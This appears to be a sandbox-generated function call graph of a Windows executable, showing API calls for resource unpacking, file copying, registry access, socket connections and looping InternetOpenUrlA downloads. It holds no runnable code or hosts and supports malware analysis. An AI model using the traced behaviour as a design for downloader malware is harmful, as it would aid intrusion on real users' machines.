19070->19140 19073 2d72eb4 _free 59 API calls 19071->19073 19076 2d74fb2 19073->19076 19075 2d75053 19080 2d72eb4 _free 59 API calls 19075->19080 19081 2d72eb4 _free 59 API calls 19076->19081 19077 2d72eb4 _free 59 API calls 19083 2d74f73 19077->19083 19084 2d74f40 19078->19084 19079 2d72eb4 _free 59 API calls 19079->19094 19086 2d75059 19080->19086 19087 2d74fc0 19081->19087 19082 2d72eb4 _free 59 API calls 19088 2d74f5e 19082->19088 19089 2d72eb4 _free 59 API calls 19083->19089 19100 2d7d31a 19084->19100 19086->19057 19092 2d72eb4 _free 59 API calls 19087->19092 19128 2d7d416 19088->19128 19089->19067 19090 2d72eb4 59 API calls _free 19090->19094 19091->19082 19095 2d74f69 19091->19095 19092->19070 19094->19075 19094->19090 19095->19077 19316 2d78997 RtlLeaveCriticalSection 19096->19316 19098 2d75b3d 19098->19060 19099->19065 19101 2d7d329 19100->19101 19127 2d7d412 19100->19127 19102 2d7d33a 19101->19102 19103 2d72eb4 _free 59 API calls 19101->19103 19104 2d7d34c 19102->19104 19105 2d72eb4 _free 59 API calls 19102->19105 19103->19102 19106 2d7d35e 19104->19106 19107 2d72eb4 _free 59 API calls 19104->19107 19105->19104 19108 2d7d370 19106->19108 19109 2d72eb4 _free 59 API calls 19106->19109 19107->19106 19110 2d7d382 19108->19110 19111 2d72eb4 _free 59 API calls 19108->19111 19109->19108 19111->19110 19127->19091 19129 2d7d421 19128->19129 19139 2d7d479 19128->19139 19130 2d7d431 19129->19130 19132 2d72eb4 _free 59 API calls 19129->19132 19131 2d7d443 19130->19131 19133 2d72eb4 _free 59 API calls 19130->19133 19134 2d7d455 19131->19134 19135 2d72eb4 _free 59 API calls 19131->19135 19132->19130 19133->19131 19136 2d72eb4 _free 59 API calls 19134->19136 19137 2d7d467 19134->19137 19135->19134 19136->19137 19137->19139 19139->19095 19141 2d7d48c 19140->19141 19142 2d74fe9 19140->19142 19143 2d72eb4 _free 59 API calls 19141->19143 19142->19079 19144 2d7d494 19143->19144 19145 2d72eb4 _free 59 API calls 19144->19145 19146 2d7d49c 19145->19146 19147 2d72eb4 _free 59 API calls 19146->19147 19148 2d7d4a4 19147->19148 19316->19098 19317 402159 19318 40b01f VirtualAlloc 19317->19318 19319 40b7d8 19318->19319 19320 2d6104d 19321 2d732e7 __cinit 68 API calls 19320->19321 19322 2d61057 19321->19322 19325 2d61aa9 InterlockedIncrement 19322->19325 19326 2d61ac5 WSAStartup InterlockedExchange 19325->19326 19327 2d6105c 19325->19327 19326->19327 19328 40b8dc LoadLibraryExA 19329 2d6648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 19330 2d664f3 GetTickCount 19329->19330 19407 2d642c7 19329->19407 19408 2d6605a 19330->19408 19409 2d72eec _malloc 59 API calls 19408->19409 19410 2d6606d 19409->19410 19411 402d60 GetVersion 19435 4039f0 HeapCreate 19411->19435 19413 402dbf 19414 402dc4 19413->19414 19415 402dcc 19413->19415 19510 402e7b 19414->19510 19447 4036d0 19415->19447 19419 402dd4 GetCommandLineA 19461 40359e 19419->19461 19423 402dee 19493 403298 19423->19493 19425 402df3 19426 402df8 GetStartupInfoA 19425->19426 19506 403240 19426->19506 19428 402e0a GetModuleHandleA 19430 402e2e 19428->19430 19516 402fe7 19430->19516 19436 403a10 19435->19436 19437 403a46 19435->19437 19523 4038a8 19436->19523 19437->19413 19440 403a2c 19443 403a49 19440->19443 19445 404618 5 API calls 19440->19445 19441 403a1f 19535 403dc7 HeapAlloc 19441->19535 19443->19413 19444 403a29 19444->19443 19446 403a3a HeapDestroy 19444->19446 19445->19444 19446->19437 19591 402e9f 19447->19591 19450 4036ef GetStartupInfoA 19457 403800 19450->19457 19460 40373b 19450->19460 19453 403867 SetHandleCount 19453->19419 19454 403827 GetStdHandle 19456 403835 GetFileType 19454->19456 19454->19457 19455 402e9f 12 API calls 19455->19460 19456->19457 19457->19453 19457->19454 19458 4037ac 19458->19457 19459 4037ce GetFileType 19458->19459 19459->19458 19460->19455 19460->19457 19460->19458 19462 4035b9 GetEnvironmentStringsW 19461->19462 19463 4035ec 19461->19463 19464 4035c1 19462->19464 19465 4035cd GetEnvironmentStrings 19462->19465 19463->19464 19466 4035dd 19463->19466 19467 403605 WideCharToMultiByte 19464->19467 19468 4035f9 GetEnvironmentStringsW 19464->19468 19465->19466 19469 402de4 19465->19469 19466->19469 19470 40368b 19466->19470 19471 40367f GetEnvironmentStrings 19466->19471 19473 403639 19467->19473 19474 40366b FreeEnvironmentStringsW 19467->19474 19468->19467 19468->19469 19484 403351 19469->19484 19475 402e9f 12 API calls 19470->19475 19471->19469 19471->19470 19476 402e9f 12 API calls 19473->19476 19474->19469 19482 4036a6 19475->19482 19477 40363f 19476->19477 19477->19474 19478 403648 WideCharToMultiByte 19477->19478 19480 403662 19478->19480 19481 403659 19478->19481 19479 4036bc FreeEnvironmentStringsA 19479->19469 19480->19474 19483 402f51 7 API calls 19481->19483 19482->19479 19483->19480 19485 403363 19484->19485 19486 403368 GetModuleFileNameA 19484->19486 19620 405042 19485->19620 19488 40338b 19486->19488 19489 402e9f 12 API calls 19488->19489 19490 4033ac 19489->19490 19491 4033bc 19490->19491 19492 402e56 7 API calls 19490->19492 19491->19423 19492->19491 19494 4032a5 19493->19494 19496 4032aa 19493->19496 19495 405042 19 API calls 19494->19495 19495->19496 19497 402e9f 12 API calls 19496->19497 19498 4032d7 19497->19498 19499 402e56 7 API calls 19498->19499 19500 4032eb 19498->19500 19499->19500 19503 402e9f 12 API calls 19500->19503 19504 40332e 19500->19504 19505 402e56 7 API calls 19500->19505 19501 402f51 7 API calls 19502 40333a 19501->19502 19502->19425 19503->19500 19504->19501 19505->19500 19507 403249 19506->19507 19509 40324e 19506->19509 19508 405042 19 API calls 19507->19508 19508->19509 19509->19428 19511 402e84 19510->19511 19512 402e89 19510->19512 19513 403c20 7 API calls 19511->19513 19514 403c59 7 API calls 19512->19514 19513->19512 19515 402e92 ExitProcess 19514->19515 19644 403009 19516->19644 19519 4030bc 19520 4030c8 19519->19520 19521 4031f1 UnhandledExceptionFilter 19520->19521 19522 402e48 19520->19522 19521->19522 19537 402c40 19523->19537 19526 4038eb GetEnvironmentVariableA 19530 40390a 19526->19530 19534 4039c8 19526->19534 19527 4038d1 19527->19526 19529 4038e3 19527->19529 19529->19440 19529->19441 19531 40394f GetModuleFileNameA 19530->19531 19532 403947 19530->19532 19531->19532 19532->19534 19539 40505e 19532->19539 19534->19529 19542 40387b GetModuleHandleA 19534->19542 19536 403de3 19535->19536 19536->19444 19538 402c4c GetVersionExA 19537->19538 19538->19526 19538->19527 19544 405075 19539->19544 19543 403892 19542->19543 19543->19529 19546 40508d 19544->19546 19548 4050bd 19546->19548 19551 405d39 19546->19551 19547 405d39 6 API calls 19547->19548 19548->19547 19550 405071 19548->19550 19555 405c6d 19548->19555 19550->19534 19552 405d57 19551->19552 19554 405d4b 19551->19554 19561 405b24 19552->19561 19554->19546 19556 405c98 19555->19556 19560 405c7b 19555->19560 19557 405cb4 19556->19557 19558 405d39 6 API calls 19556->19558 19557->19560 19573 4058d5 19557->19573 19558->19557 19560->19548 19562 405b6d 19561->19562 19563 405b55 GetStringTypeW 19561->19563 19565 405b98 GetStringTypeA 19562->19565 19569 405bbc 19562->19569 19563->19562 19564 405b71 GetStringTypeA 19563->19564 19564->19562 19566 405c59 19564->19566 19565->19566 19566->19554 19568 405bd2 MultiByteToWideChar 19568->19566 19570 405bf6 19568->19570 19569->19566 19569->19568 19570->19566 19571 405c30 MultiByteToWideChar 19570->19571 19571->19566 19572 405c49 GetStringTypeW 19571->19572 19572->19566 19574 405905 LCMapStringW 19573->19574 19575 405921 19573->19575 19574->19575 19576 405929 LCMapStringA 19574->19576 19578 405987 19575->19578 19579 40596a LCMapStringA 19575->19579 19576->19575 19577 405a63 19576->19577 19577->19560 19578->19577 19580 40599d MultiByteToWideChar 19578->19580 19579->19577 19580->19577 19581 4059c7 19580->19581 19581->19577 19582 4059fd MultiByteToWideChar 19581->19582 19582->19577 19583 405a16 LCMapStringW 19582->19583 19583->19577 19584 405a31 19583->19584 19585 405a37 19584->19585 19587 405a77 19584->19587 19585->19577 19586 405a45 LCMapStringW 19585->19586 19586->19577 19587->19577 19588 405aaf LCMapStringW 19587->19588 19588->19577 19589 405ac7 WideCharToMultiByte 19588->19589 19589->19577 19592 402eb1 12 API calls 19591->19592 19593 402eae 19592->19593 19593->19450 19594 402e56 19593->19594 19595 402e64 19594->19595 19596 402e5f 19594->19596 19606 403c59 19595->19606 19600 403c20 19596->19600 19601 403c2a 19600->19601 19602 403c59 7 API calls 19601->19602 19605 403c57 19601->19605 19603 403c41 19602->19603 19604 403c59 7 API calls 19603->19604 19604->19605 19605->19595 19608 403c6c 19606->19608 19607 403d83 19611 403d96 GetStdHandle WriteFile 19607->19611 19608->19607 19609 403cac 19608->19609 19614 402e6d 19608->19614 19610 403cb8 GetModuleFileNameA 19609->19610 19609->19614 19612 403cd0 19610->19612 19611->19614 19615 405408 19612->19615 19614->19450 19616 405415 LoadLibraryA 19615->19616 19618 405457 19615->19618 19617 405426 GetProcAddress 19616->19617 19616->19618 19617->19618 19619 40543d GetProcAddress GetProcAddress 19617->19619 19618->19614 19619->19618 19621 40504b 19620->19621 19622 405052 19620->19622 19624 404c7e 19621->19624 19622->19486 19631 404e17 19624->19631 19626 404e0b 19626->19622 19629 404cc1 GetCPInfo 19630 404cd5 19629->19630 19630->19626 19636 404ebd GetCPInfo 19630->19636 19632 404e37 19631->19632 19633 404e27 GetOEMCP 19631->19633 19634 404c8f 19632->19634 19635 404e3c GetACP 19632->19635 19633->19632 19634->19626 19634->19629 19634->19630 19635->19634 19637 404ee0 19636->19637 19643 404fa8 19636->19643 19638 405b24 6 API calls 19637->19638 19639 404f5c 19638->19639 19640 4058d5 9 API calls 19639->19640 19641 404f80 19640->19641 19642 4058d5 9 API calls 19641->19642 19642->19643 19643->19626 19645 403015 GetCurrentProcess TerminateProcess 19644->19645 19646 403026 19644->19646 19645->19646 19647 402e37 19646->19647 19648 403090 ExitProcess 19646->19648 19647->19519 19649 402160 19650 4027c6 RegQueryValueExA 19649->19650 19652 2e00d80 19653 2e011a8 19652->19653 19657 2d6f7da CreateFileA 19653->19657 19654 2e011ad 19656 2d6f7da 64 API calls 19654->19656 19656->19654 19658 2d6f8d6 19657->19658 19661 2d6f80b 19657->19661 19658->19654 19659 2d6f823 DeviceIoControl 19659->19661 19660 2d6f8cc CloseHandle 19660->19658 19661->19659 19661->19660 19662 2d6f898 GetLastError 19661->19662 19663 2d73a8f _Allocate 60 API calls 19661->19663 19662->19660 19662->19661 19663->19661 19664 4021a8 RegCloseKey 19665 4021ae SetEvent 19664->19665 19667 40b4ab 19668 40b4ae 19667->19668 19669 402621 19668->19669 19670 40b4df RegOpenKeyExA 19668->19670 19670->19668 19671 2dfa471 19672 2dfb2e4 CreateFileA 19671->19672 19673 2e01310 19672->19673 19674 40b7ae 19675 40b7cd 19674->19675 19676 40b801 Sleep 19675->19676 19677 40b809 19676->19677 19677->19677 19678 2d61139 19683 2d6ccdb 19678->19683 19680 2d61143 19681 2d732e7 __cinit 68 API calls 19680->19681 19682 2d6114f 19681->19682 19684 2d6cce5 __EH_prolog 19683->19684 19697 2d6d29e 19684->19697 19688 2d6cd08 19689 2d73a8f _Allocate 60 API calls 19688->19689 19694 2d6cd93 19688->19694 19690 2d6cd42 19689->19690 19691 2d6cd5b 19690->19691 19704 2d6d2fb 19690->19704 19708 2d6dee6 19691->19708 19694->19680 19695 2d6cd6a shared_ptr 19696 2d732e7 __cinit 68 API calls 19695->19696 19696->19694 19712 2d72413 19697->19712 19700 2d6dab4 19701 2d6dabe __EH_prolog 19700->19701 19721 2d6d44b 19701->19721 19703 2d6daf3 Mailbox 19703->19688 19705 2d6d305 __EH_prolog 19704->19705 19706 2d6d44b 59 API calls 19705->19706 19707 2d6d33a 19706->19707 19707->19691 19709 2d6def0 __EH_prolog 19708->19709 19738 2d6e7ee 19709->19738 19711 2d6df21 19711->19695 19715 2d724d9 19712->19715 19716 2d724e5 _strlen 19715->19716 19717 2d6ccf7 19715->19717 19718 2d72eec _malloc 59 API calls 19716->19718 19717->19700 19719 2d724f7 19718->19719 19719->19717 19720 2d76bfc std::exception::_Copy_str 59 API calls 19719->19720 19720->19717 19722 2d6d455 Mailbox __EH_prolog 19721->19722 19725 2d72453 19722->19725 19728 2d72481 19725->19728 19729 2d7248f 19728->19729 19731 2d6d47d 19728->19731 19734 2d72517 19729->19734 19731->19703 19733 2d724d9 std::exception::_Copy_str 59 API calls 19733->19731 19735 2d72520 19734->19735 19736 2d72494 19734->19736 19737 2d72eb4 _free 59 API calls 19735->19737 19736->19731 19736->19733 19737->19736 19741 2d6ecc8 19738->19741 19740 2d6e7fe shared_ptr 19740->19711 19742 2d6ecd2 __EH_prolog 19741->19742 19743 2d73a8f _Allocate 60 API calls 19742->19743 19744 2d6ece9 19743->19744 19744->19740 19745 402332 19748 40257b CopyFileA 19745->19748 19747 40261f 19748->19747 19749 402277 lstrcmpiW 19750 402600 19749->19750 19751 40b083 lstrcmpiW 19750->19751 19752 4021ae 19750->19752 19751->19752 19753 40b336 SetEvent 19752->19753 19754 40b8c7 19752->19754 19755 40b4bc 19760 401f64 FindResourceA 19755->19760 19757 40b4c6 Sleep 19759 40b809 19757->19759 19759->19759 19761 401f86 GetLastError SizeofResource 19760->19761 19762 401f9f 19760->19762 19761->19762 19763 401fa6 LoadResource LockResource GlobalAlloc 19761->19763 19762->19757 19764 401fd2 19763->19764 19764->19764 19765 401ffb GetTickCount 19764->19765 19767 402005 GlobalAlloc 19765->19767 19767->19762 19768 2d672ab InternetOpenA 19769 2d672c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19768->19769 19806 2d666f4 _memset shared_ptr 19768->19806 19776 2d67342 _memset 19769->19776 19770 2d67322 InternetOpenUrlA 19771 2d67382 InternetCloseHandle 19770->19771 19770->19776 19771->19806 19772 2d6670e RtlEnterCriticalSection RtlLeaveCriticalSection 19772->19806 19773 2d66708 Sleep 19773->19772 19774 2d67346 InternetReadFile 19775 2d67377 InternetCloseHandle 19774->19775 19774->19776 19775->19771 19776->19770 19776->19774 19777 2d673e9 RtlEnterCriticalSection RtlLeaveCriticalSection 19879 2d7227c 19777->19879 19779 2d72eec _malloc 59 API calls 19780 2d6749d RtlEnterCriticalSection RtlLeaveCriticalSection 19779->19780 19780->19806 19781 2d6776a RtlEnterCriticalSection RtlLeaveCriticalSection 19781->19806 19783 2d7227c 66 API calls 19783->19806 19786 2d678e2 RtlEnterCriticalSection 19787 2d6790f RtlLeaveCriticalSection 19786->19787 19786->19806 19931 2d63c67 19787->19931 19789 2d72eec 59 API calls _malloc 19789->19806 19790 2d72eb4 59 API calls _free 19790->19806 19795 2d73529 60 API calls _strtok 19795->19806 19797 2d73a8f _Allocate 60 API calls 19797->19806 19800 2d6a65c 73 API calls 19800->19806 19806->19768 19806->19772 19806->19773 19806->19777 19806->19779 19806->19781 19806->19783 19806->19786 19806->19787 19806->19789 19806->19790 19806->19795 19806->19797 19806->19800 19807 2d676e7 shared_ptr 19806->19807 19808 2d676ec Sleep 19806->19808 19811 2d65119 19806->19811 19840 2d6ab46 19806->19840 19850 2d661f5 19806->19850 19853 2d68272 19806->19853 19859 2d6d04e 19806->19859 19864 2d68321 19806->19864 19872 2d633b2 19806->19872 19889 2d72790 19806->19889 19892 2d6966e 19806->19892 19899 2d6a786 19806->19899 19907 2d64100 19806->19907 19911 2d72358 19806->19911 19922 2d61ba7 19806->19922 19938 2d63d7e 19806->19938 19945 2d68f3a 19806->19945 19952 2d6534d 19806->19952 19807->19808 19903 2d71830 19808->19903 19812 2d65123 __EH_prolog 19811->19812 19962 2d70a50 19812->19962 19815 2d63c67 72 API calls 19816 2d6514a 19815->19816 19817 2d63d7e 64 API calls 19816->19817 19818 2d65158 19817->19818 19819 2d68272 89 API calls 19818->19819 19820 2d6516c 19819->19820 19823 2d65322 shared_ptr 19820->19823 19966 2d6a65c 19820->19966 19823->19806 19824 2d651f6 19826 2d6a65c 73 API calls 19824->19826 19825 2d651c4 19827 2d6a65c 73 API calls 19825->19827 19829 2d65207 19826->19829 19828 2d651d4 19827->19828 19828->19823 19831 2d6a65c 73 API calls 19828->19831 19829->19823 19830 2d6a65c 73 API calls 19829->19830 19832 2d6524a 19830->19832 19833 2d652b4 19831->19833 19832->19823 19834 2d6a65c 73 API calls 19832->19834 19833->19823 19835 2d6a65c 73 API calls 19833->19835 19834->19828 19836 2d652da 19835->19836 19836->19823 19837 2d6a65c 73 API calls 19836->19837 19838 2d65304 19837->19838 19971 2d6ce10 19838->19971 19841 2d6ab50 __EH_prolog 19840->19841 20022 2d6d025 19841->20022 19843 2d6ab71 shared_ptr 20025 2d72030 19843->20025 19845 2d6ab9e 19845->19806 19846 2d6ab88 19846->19845 20031 2d63fb0 19846->20031 19851 2d72eec _malloc 59 API calls 19850->19851 19852 2d66208 19851->19852 19854 2d682ab 19853->19854 19855 2d6828a 19853->19855 19858 2d682d0 19854->19858 20455 2d62ac7 19854->20455 20452 2d69534 19855->20452 19858->19806 19860 2d70a50 Mailbox 68 API calls 19859->19860 19861 2d6d064 19860->19861 19862 2d6d152 19861->19862 19863 2d62db5 73 API calls 19861->19863 19862->19806 19863->19861 19865 2d6833c WSASetLastError shutdown 19864->19865 19866 2d6832c 19864->19866 19868 2d6a440 69 API calls 19865->19868 19867 2d70a50 Mailbox 68 API calls 19866->19867 19870 2d68331 19867->19870 19869 2d68359 19868->19869 19869->19870 19871 2d70a50 Mailbox 68 API calls 19869->19871 19870->19806 19871->19870 19873 2d633c4 InterlockedCompareExchange 19872->19873 19874 2d633e1 19872->19874 19873->19874 19876 2d633d6 19873->19876 19875 2d629ee 76 API calls 19874->19875 19877 2d633f1 19875->19877 20549 2d632ab 19876->20549 19877->19806 19880 2d722ab 19879->19880 19881 2d72288 19879->19881 20602 2d722c3 19880->20602 19881->19880 19882 2d7228e 19881->19882 19884 2d75d9b __cftof_l 59 API calls 19882->19884 19886 2d72293 19884->19886 19885 2d722be 19885->19806 19887 2d74e35 __cftof_l 9 API calls 19886->19887 19888 2d7229e 19887->19888 19888->19806 20612 2d727ae 19889->20612 19891 2d727a9 19891->19806 19893 2d69678 __EH_prolog 19892->19893 19894 2d61ba7 210 API calls 19893->19894 19895 2d696cd 19894->19895 19896 2d696ea RtlEnterCriticalSection 19895->19896 19897 2d69705 19896->19897 19898 2d69708 RtlLeaveCriticalSection 19896->19898 19897->19898 19898->19806 19900 2d6a790 __EH_prolog 19899->19900 20618 2d6df37 19900->20618 19902 2d6a7ae shared_ptr 19902->19806 19904 2d71861 19903->19904 19905 2d7183d 19903->19905 19904->19806 19905->19904 19906 2d71851 GetProcessHeap HeapFree 19905->19906 19906->19904 19908 2d64112 19907->19908 19909 2d64118 19907->19909 20622 2d6a63a 19908->20622 19909->19806 19912 2d72374 19911->19912 19913 2d72389 19911->19913 19914 2d75d9b __cftof_l 59 API calls 19912->19914 19913->19912 19915 2d72390 19913->19915 19916 2d72379 19914->19916 20624 2d75f90 19915->20624 19918 2d74e35 __cftof_l 9 API calls 19916->19918 19920 2d72384 19918->19920 19920->19806 20849 2d85330 19922->20849 19924 2d61bb1 RtlEnterCriticalSection 19925 2d61be9 RtlLeaveCriticalSection 19924->19925 19927 2d61bd1 19924->19927 20850 2d6e267 19925->20850 19927->19925 19928 2d61c55 RtlLeaveCriticalSection 19927->19928 19928->19806 19929 2d61c22 19929->19928 19932 2d70a50 Mailbox 68 API calls 19931->19932 19933 2d63c7e 19932->19933 20932 2d63ca2 19933->20932 19939 2d63dcb htons 19938->19939 19940 2d63d99 htons 19938->19940 20965 2d63c16 19939->20965 20959 2d63bd3 19940->20959 19944 2d63ded 19944->19806 19946 2d68f44 __EH_prolog 19945->19946 20996 2d6373f 19946->20996 19948 2d68f5e RtlEnterCriticalSection 19949 2d68f6d RtlLeaveCriticalSection 19948->19949 19951 2d68fa7 19949->19951 19951->19806 19953 2d72eec _malloc 59 API calls 19952->19953 19954 2d65362 SHGetSpecialFolderPathA 19953->19954 19955 2d65378 19954->19955 19955->19955 21005 2d736b4 19955->21005 19958 2d653e2 19958->19806 19960 2d653dc 21021 2d739c7 19960->21021 19963 2d6513d 19962->19963 19964 2d70a79 19962->19964 19963->19815 19965 2d732e7 __cinit 68 API calls 19964->19965 19965->19963 19967 2d70a50 Mailbox 68 API calls 19966->19967 19969 2d6a676 19967->19969 19968 2d6519d 19968->19823 19968->19824 19968->19825 19969->19968 19976 2d62db5 19969->19976 19972 2d70a50 Mailbox 68 API calls 19971->19972 19975 2d6ce2a 19972->19975 19973 2d6cf39 19973->19823 19975->19973 20003 2d62b95 19975->20003 19977 2d62de4 19976->19977 19978 2d62dca 19976->19978 19980 2d62dfc 19977->19980 19983 2d62def 19977->19983 19979 2d70a50 Mailbox 68 API calls 19978->19979 19982 2d62dcf 19979->19982 19990 2d62d39 WSASetLastError WSASend 19980->19990 19982->19969 19984 2d70a50 Mailbox 68 API calls 19983->19984 19984->19982 19985 2d62e0c 19985->19982 19986 2d62e54 WSASetLastError select 19985->19986 19988 2d70a50 68 API calls Mailbox 19985->19988 19989 2d62d39 71 API calls 19985->19989 20000 2d6a440 19986->20000 19988->19985 19989->19985 19991 2d6a440 69 API calls 19990->19991 19992 2d62d6e 19991->19992 19993 2d62d75 19992->19993 19994 2d62d82 19992->19994 19995 2d70a50 Mailbox 68 API calls 19993->19995 19996 2d70a50 Mailbox 68 API calls 19994->19996 19998 2d62d7a 19994->19998 19995->19998 19996->19998 19997 2d62d9c 19997->19985 19998->19997 19999 2d70a50 Mailbox 68 API calls 19998->19999 19999->19997 20001 2d70a50 Mailbox 68 API calls 20000->20001 20002 2d6a44c WSAGetLastError 20001->20002 20002->19985 20004 2d62bc7 20003->20004 20005 2d62bb1 20003->20005 20008 2d62bd2 20004->20008 20012 2d62bdf 20004->20012 20006 2d70a50 Mailbox 68 API calls 20005->20006 20007 2d62bb6 20006->20007 20007->19975 20010 2d70a50 Mailbox 68 API calls 20008->20010 20009 2d62be2 WSASetLastError WSARecv 20011 2d6a440 69 API calls 20009->20011 20010->20007 20011->20012 20012->20007 20012->20009 20013 2d70a50 68 API calls Mailbox 20012->20013 20014 2d62d22 20012->20014 20016 2d62cbc WSASetLastError select 20012->20016 20013->20012 20018 2d61996 20014->20018 20017 2d6a440 69 API calls 20016->20017 20017->20012 20019 2d6199f 20018->20019 20020 2d619bb 20018->20020 20021 2d732e7 __cinit 68 API calls 20019->20021 20020->20007 20021->20020 20044 2d6e1b7 20022->20044 20024 2d6d037 20024->19843 20107 2d732fc 20025->20107 20028 2d72054 20028->19846 20029 2d7207d ResumeThread 20029->19846 20030 2d72076 CloseHandle 20030->20029 20032 2d70a50 Mailbox 68 API calls 20031->20032 20033 2d63fb8 20032->20033 20426 2d61815 20033->20426 20036 2d6a5c2 20037 2d6a5cc __EH_prolog 20036->20037 20429 2d6cb7a 20037->20429 20045 2d6e1c1 __EH_prolog 20044->20045 20050 2d64030 20045->20050 20049 2d6e1ef 20049->20024 20062 2d85330 20050->20062 20052 2d6403a GetProcessHeap RtlAllocateHeap 20053 2d64053 std::exception::exception 20052->20053 20054 2d6407c 20052->20054 20063 2d6a601 20053->20063 20054->20049 20056 2d6408a 20054->20056 20057 2d64094 __EH_prolog 20056->20057 20088 2d6a220 20057->20088 20062->20052 20064 2d6a60b __EH_prolog 20063->20064 20071 2d6cbb0 20064->20071 20069 2d7449a __CxxThrowException@8 RaiseException 20070 2d6a639 20069->20070 20077 2d6d710 20071->20077 20074 2d6cbca 20080 2d6d748 20074->20080 20076 2d6a628 20076->20069 20078 2d72453 std::exception::exception 59 API calls 20077->20078 20079 2d6a61a 20078->20079 20079->20074 20081 2d6d752 __EH_prolog 20080->20081 20084 2d6b673 20081->20084 20083 2d6d789 Mailbox 20083->20076 20085 2d6b67d __EH_prolog 20084->20085 20086 2d72453 std::exception::exception 59 API calls 20085->20086 20087 2d6b68e Mailbox 20086->20087 20087->20083 20099 2d6b037 20088->20099 20091 2d63fdc 20106 2d85330 20091->20106 20093 2d63fe6 CreateEventA 20094 2d6400f 20093->20094 20095 2d63ffd 20093->20095 20094->20049 20096 2d63fb0 Mailbox 68 API calls 20095->20096 20097 2d64005 20096->20097 20098 2d6a5c2 Mailbox 60 API calls 20097->20098 20098->20094 20100 2d6b043 20099->20100 20101 2d640c1 20099->20101 20102 2d73a8f _Allocate 60 API calls 20100->20102 20103 2d6b053 std::exception::exception 20100->20103 20101->20091 20102->20103 20103->20101 20104 2d7449a __CxxThrowException@8 RaiseException 20103->20104 20105 2d6fa68 20104->20105 20106->20093 20108 2d7331e 20107->20108 20109 2d7330a 20107->20109 20110 2d789ac __calloc_crt 59 API calls 20108->20110 20111 2d75d9b __cftof_l 59 API calls 20109->20111 20112 2d7332b 20110->20112 20113 2d7330f 20111->20113 20114 2d7337c 20112->20114 20116 2d75b9a ___InternalCxxFrameHandler 59 API calls 20112->20116 20115 2d74e35 __cftof_l 9 API calls 20113->20115 20117 2d72eb4 _free 59 API calls 20114->20117 20121 2d7204b 20115->20121 20118 2d73338 20116->20118 20119 2d73382 20117->20119 20120 2d75c21 __initptd 59 API calls 20118->20120 20119->20121 20126 2d75d7a 20119->20126 20122 2d73341 CreateThread 20120->20122 20121->20028 20121->20029 20121->20030 20122->20121 20125 2d73374 GetLastError 20122->20125 20134 2d7345c 20122->20134 20125->20114 20131 2d75d67 20126->20131 20128 2d75d83 __dosmaperr 20129 2d75d9b __cftof_l 59 API calls 20128->20129 20130 2d75d96 20129->20130 20130->20121 20132 2d75bb2 __getptd_noexit 59 API calls 20131->20132 20133 2d75d6c 20132->20133 20133->20128 20135 2d73465 __threadstartex@4 20134->20135 20136 2d7910b __freeptd TlsGetValue 20135->20136 20137 2d7346b 20136->20137 20138 2d7349e 20137->20138 20139 2d73472 __threadstartex@4 20137->20139 20140 2d75a2f __freefls@4 59 API calls 20138->20140 20141 2d7912a __freeptd TlsSetValue 20139->20141 20146 2d734b9 ___crtIsPackagedApp 20140->20146 20142 2d73481 20141->20142 20143 2d73487 GetLastError RtlExitUserThread 20142->20143 20144 2d73494 GetCurrentThreadId 20142->20144 20143->20144 20144->20146 20145 2d734cd 20156 2d73395 20145->20156 20146->20145 20150 2d73404 20146->20150 20151 2d73446 RtlDecodePointer 20150->20151 20152 2d7340d LoadLibraryExW GetProcAddress 20150->20152 20155 2d73456 20151->20155 20153 2d73430 RtlEncodePointer 20152->20153 20154 2d7342f 20152->20154 20153->20151 20154->20145 20155->20145 20157 2d733a1 __getstream 20156->20157 20158 2d75b9a ___InternalCxxFrameHandler 59 API calls 20157->20158 20159 2d733a6 20158->20159 20166 2d720a0 20159->20166 20184 2d71550 20166->20184 20169 2d720f0 20206 2d6dceb 20169->20206 20170 2d720e8 TlsSetValue 20170->20169 20188 2d715b4 20184->20188 20185 2d71630 20186 2d71646 20185->20186 20189 2d71643 CloseHandle 20185->20189 20191 2d7448b __cftof_l 6 API calls 20186->20191 20187 2d715cc 20190 2d7160e ResetEvent 20187->20190 20192 2d715e5 OpenEventA 20187->20192 20222 2d71b50 20187->20222 20188->20185 20188->20187 20194 2d716dc WaitForSingleObject 20188->20194 20201 2d716b0 CreateEventA 20188->20201 20203 2d71b50 GetCurrentProcessId 20188->20203 20204 2d716ce CloseHandle 20188->20204 20189->20186 20195 2d71615 20190->20195 20193 2d7165e 20191->20193 20197 2d71607 20192->20197 20198 2d715ff 20192->20198 20193->20169 20193->20170 20194->20188 20226 2d71790 20195->20226 20197->20190 20197->20195 20198->20197 20200 2d71604 CloseHandle 20198->20200 20199 2d715e2 20199->20192 20200->20197 20201->20188 20203->20188 20204->20188 20207 2d6dd0d 20206->20207 20236 2d70bb0 20222->20236 20224 2d71ba2 GetCurrentProcessId 20225 2d71bb5 20224->20225 20225->20199 20227 2d7179f 20226->20227 20230 2d717d5 CreateEventA 20227->20230 20231 2d71b50 GetCurrentProcessId 20227->20231 20232 2d717f7 20227->20232 20228 2d71803 SetEvent 20229 2d7162d 20228->20229 20229->20185 20230->20232 20233 2d717eb 20230->20233 20234 2d717d2 20231->20234 20232->20228 20232->20229 20233->20232 20235 2d717f0 CloseHandle 20233->20235 20234->20230 20235->20232 20236->20224 20427 2d72413 std::exception::exception 59 API calls 20426->20427 20428 2d6182a 20427->20428 20428->20036 20435 2d6d641 20429->20435 20432 2d6cb94 20444 2d6d679 20432->20444 20438 2d6b165 20435->20438 20439 2d6b16f __EH_prolog 20438->20439 20440 2d72453 std::exception::exception 59 API calls 20439->20440 20441 2d6b180 20440->20441 20442 2d67c35 std::bad_exception::bad_exception 60 API calls 20441->20442 20443 2d6a5e1 20442->20443 20443->20432 20445 2d6d683 __EH_prolog 20444->20445 20448 2d6b55d 20445->20448 20449 2d6b567 __EH_prolog 20448->20449 20450 2d6b165 std::bad_exception::bad_exception 60 API calls 20449->20450 20451 2d6b578 Mailbox 20450->20451 20473 2d6353e 20452->20473 20456 2d62ae8 WSASetLastError connect 20455->20456 20457 2d62ad8 20455->20457 20458 2d6a440 69 API calls 20456->20458 20459 2d70a50 Mailbox 68 API calls 20457->20459 20460 2d62b07 20458->20460 20461 2d62add 20459->20461 20460->20461 20462 2d70a50 Mailbox 68 API calls 20460->20462 20463 2d70a50 Mailbox 68 API calls 20461->20463 20462->20461 20464 2d62b1b 20463->20464 20466 2d70a50 Mailbox 68 API calls 20464->20466 20468 2d62b38 20464->20468 20466->20468 20472 2d62b87 20468->20472 20533 2d63027 20468->20533 20471 2d70a50 